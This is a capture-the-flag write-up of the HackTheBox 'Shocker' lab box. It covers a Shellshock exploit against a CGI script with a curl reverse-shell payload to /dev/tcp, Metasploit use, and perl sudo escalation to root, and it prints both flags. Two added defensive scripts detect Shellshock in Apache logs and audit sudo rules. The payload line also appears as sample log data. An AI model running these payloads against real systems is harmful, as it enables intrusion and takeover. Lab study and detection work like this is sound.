Hackthebox - Shocker

Box information

Box type

Information gathering

Nmap

┌──(root💀kali)-[~/Desktop/HTB/Easy/Shocker]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-01 22:29 EDT
Nmap scan report for 10.10.10.56
Host is up (0.25s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 61716/tcp)
HOP RTT       ADDRESS
1   246.66 ms 10.10.14.1
2   246.79 ms 10.10.10.56

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.63 seconds

HTTP

Nothing of interest on the web page itself, so fuzz for directories.

Fuzz

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.56/FUZZ" -w /usr/share/dirb/wordlists/common.txt                                   

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.56/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 137, Words: 9, Lines: 10]
.hta                    [Status: 403, Size: 290, Words: 22, Lines: 12]
.htaccess               [Status: 403, Size: 295, Words: 22, Lines: 12]
.htpasswd               [Status: 403, Size: 295, Words: 22, Lines: 12]
cgi-bin/                [Status: 403, Size: 294, Words: 22, Lines: 12]
index.html              [Status: 200, Size: 137, Words: 9, Lines: 10]
server-status           [Status: 403, Size: 299, Words: 22, Lines: 12]
:: Progress: [4614/4614] :: Job [1/1] :: 80 req/sec :: Duration: [0:01:00] :: Errors: 0 ::

There is a cgi-bin directory, so keep fuzzing inside it.

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.56/cgi-bin/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -e .sh,.pl

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.56/cgi-bin/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Extensions       : .sh .pl 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

user.sh                 [Status: 200, Size: 118, Words: 19, Lines: 8]
                        [Status: 403, Size: 294, Words: 22, Lines: 12]
:: Progress: [60348/60348] :: Job [1/1] :: 152 req/sec :: Duration: [0:15:14] :: Errors: 19 ::

A user.sh file turns up; take a look at it.

Not quite sure what this is, so let's Google it.

https://antonyt.com/blog/2020-03-27/exploiting-cgi-scripts-with-shellshock

Found this article.

Exploitation

Shellshock

Following the article, try for a reverse shell.

Listen on a port with nc

nc -nvlp 4444

Then trigger the vulnerability

curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1" http://10.10.10.56/cgi-bin/user.sh
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 40320
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami&&id
whoami&&id
shelly
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$

That gives a shell as the user.
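As an added defender-side check (not part of the original writeup): the curl request above lands in Apache's access log with the payload in the User-Agent field, and the Metasploit module below defaults to the same header, so the "() {" function prefix that every Shellshock payload starts with is a reliable log signature. The script parses combined-format log lines and flags that marker in any client-controlled field; the sample log lines are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format: client ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Every Shellshock (CVE-2014-6271 family) payload opens with a bash function definition, "() {",
# placed in a header that the CGI handler exports into the script's environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Paths this host serves through mod_cgi (the cgi-bin directory found with ffuf above).
CGI_PREFIXES = ("/cgi-bin/",)

# Constructed sample: a benign hit, the curl request from this writeup as Apache would log it
# (the payload rides in User-Agent), and the marker placed in Referer against a non-CGI path.
SAMPLE_LOG = [
    '10.10.14.4 - - [01/Apr/2022:22:40:01 -0400] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.4 - - [01/Apr/2022:22:45:10 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" '
    '"() { :;}; /bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"',
    '10.10.14.4 - - [01/Apr/2022:22:46:33 -0400] "GET /index.html HTTP/1.1" 200 137 '
    '"() { :; }; echo vulnerable" "curl/7.74.0"',
]

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields; None if the line does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def find_shellshock(line: str) -> Optional[Dict[str, object]]:
    """Return a finding if any client-controlled field carries the "() {" marker, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = rec["request"].split(" ")
    path = parts[1] if len(parts) >= 2 else rec["request"]
    for field in ("agent", "referer", "request"):   # each of these ends up in the CGI environment
        if SHELLSHOCK_RE.search(rec[field]):
            return {"client": rec["client"], "field": field, "path": path,
                    "cgi_target": any(path.startswith(p) for p in CGI_PREFIXES),
                    "status": rec["status"]}
    return None

def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run the check over a whole log, keeping only the lines that trip it."""
    return [f for f in (find_shellshock(l) for l in lines) if f]
```

A hit whose path is under cgi-bin and returned status 200 is the case to treat as a likely successful execution rather than a blind probe.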

exploit-db

https://www.exploit-db.com/exploits/34900

I had some trouble getting this one to work, so I did not test it.

Metasploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options 

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting   Required  Description
   ----            ---------------   --------  -----------
   CMD_MAX_LENGTH  2048              yes       CMD max line length
   CVE             CVE-2014-6271     yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent        yes       HTTP header to use
   METHOD          GET               yes       HTTP method to use
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          10.10.10.56       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH           /bin              yes       Target PATH for binaries used by the CmdStager
   RPORT           80                yes       The target port (TCP)
   SRVHOST         0.0.0.0           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080              yes       The local port to listen on.
   SSL             false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/user.sh  yes       Path to CGI script
   TIMEOUT         5                 yes       HTTP read response timeout (seconds)
   URIPATH                           no        The URI to use for this exploit (default is random)
   VHOST                             no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

With the options set, run it:

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (984904 bytes) to 10.10.10.56
[*] Meterpreter session 2 opened (10.10.14.4:4444 -> 10.10.10.56:40322) at 2022-04-02 00:56:02 -0400

meterpreter > getuid
Server username: shelly @ Shocker (uid=1000, gid=1000, euid=1000, egid=1000)

This one calls back successfully as well.

Upgrading the shell

python3 -c "import pty;pty.spawn('/bin/bash')"
Ctrl+Z to background the shell, then:
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237
shelly@Shocker:/home/shelly$ cat user.txt 
2ec24e11320026d1e70ff3e16695b233

That gets the user flag.

Privilege escalation

shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

sudo -l shows that the user may run /usr/bin/perl through sudo as root, without a password.

https://gtfobins.github.io/gtfobins/perl/

perl can be used to escalate with the method above; try it.

sudo /usr/bin/perl -e 'exec "/bin/sh";'

shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

Escalated to root.
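An added audit script (not part of the original writeup) that parses sudo -l output like the one above and flags rules which hand the user a root shell: a NOPASSWD rule for an interpreter such as perl is one, and env_reset plus secure_path do nothing to restrict it because the interpreter itself is the permitted command. The shell-capable binary list is an assumption drawn from GTFOBins, and the extra systemctl rule in the sample is constructed for contrast.

```python
import re
from typing import Dict, List

# Assumption: binaries GTFOBins documents as able to spawn a shell or run arbitrary code under sudo.
# An unrestricted rule for any of these, as root, is equivalent to an unrestricted root shell.
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "bash", "sh", "dash", "zsh",
                 "vim", "vi", "nano", "less", "more", "awk", "find", "env", "tar", "zip"}

# One rule line as printed by sudo -l: "(runas) TAG: TAG: cmd, cmd"
ENTRY_RE = re.compile(r'^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

# Constructed input: the sudo -l output from this writeup plus one benign, argument-fixed rule.
SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
"""

def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Extract the command rules that follow the 'may run the following commands' header."""
    rules, in_rules = [], False
    for raw in output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = ENTRY_RE.match(line) if in_rules and line else None
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            words = cmd.split()                      # words[0] is the path, or the literal ALL
            rules.append({"runas": m.group("runas"), "nopasswd": "NOPASSWD:" in m.group("tags"),
                          "command": cmd, "arguments_fixed": len(words) > 1,
                          "binary": words[0].rsplit("/", 1)[-1]})
    return rules

def risky_rules(rules: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Rules that give a root shell: ALL, or a shell-capable binary with no arguments pinned."""
    out = []
    for r in rules:
        as_root = str(r["runas"]).split(":")[0].strip() in ("root", "ALL")
        unrestricted = r["command"] == "ALL" or (r["binary"] in SHELL_CAPABLE and not r["arguments_fixed"])
        if as_root and unrestricted:
            out.append(r)
    return out
```

A rule with fixed arguments (like the systemctl one in the sample) still deserves a look, but it is not the open-ended root shell that the perl rule is.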

# cat root.txt
52c2715605d70c7619030560dc1ca467

That gets the root flag.